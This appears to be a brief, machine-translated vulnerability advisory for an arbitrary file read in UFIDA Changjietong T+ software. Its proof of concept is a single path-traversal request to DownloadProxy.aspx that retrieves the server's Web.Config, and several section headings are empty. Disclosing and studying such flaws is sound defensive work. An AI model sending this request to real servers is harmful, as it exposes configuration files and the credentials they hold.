Ufida Changjietong T+ Downloadproxy Aspx Arbitrary File Reading Vulnerability
Ufida Changjietong T+ Downloadproxy Aspx Arbitrary File Reading Vulnerability
UFIDA Changjietong T+ DownloadProxy.aspx Any file reading vulnerability
Vulnerability Description
UFIDA Changjietong T+ DownloadProxy.aspx file has an arbitrary file reading vulnerability. The attacker can obtain sensitive files on the server through the vulnerability.
Vulnerability Impact
UFIDA Changjietong T+
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
This post is licensed under CC BY 4.0 by the author.